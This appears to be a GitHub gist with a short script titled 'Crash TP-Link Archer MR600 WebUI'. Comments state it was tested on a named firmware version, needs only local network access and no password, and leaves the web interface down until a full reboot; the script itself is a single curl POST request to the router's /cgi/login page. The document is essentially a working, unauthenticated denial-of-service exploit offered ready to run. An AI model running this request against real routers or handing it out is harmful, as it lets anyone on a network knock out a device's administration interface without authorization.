Skip to content

Instantly share code, notes, and snippets.

@GGORG0
Last active October 13, 2024 22:30
Show Gist options
  • Select an option

  • Save GGORG0/c99d1c4f02d2582568d097d254c91bdc to your computer and use it in GitHub Desktop.

Select an option

Save GGORG0/c99d1c4f02d2582568d097d254c91bdc to your computer and use it in GitHub Desktop.
Crash TP-Link Archer MR600 WebUI
# This script crashes the WebUI of the TP-Link Archer MR600 router
# It was tested on firmware version 1.3.0 0.9.1 v0001.0 Build 210608 RC.66100n
# To fix the WebUI a full device reboot is required
# This only needs local network access, no WebUI password knowledge is needed
curl 'http://192.168.1.1/cgi/login' -X POST -H 'Referer: http://192.168.1.1/' -v
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment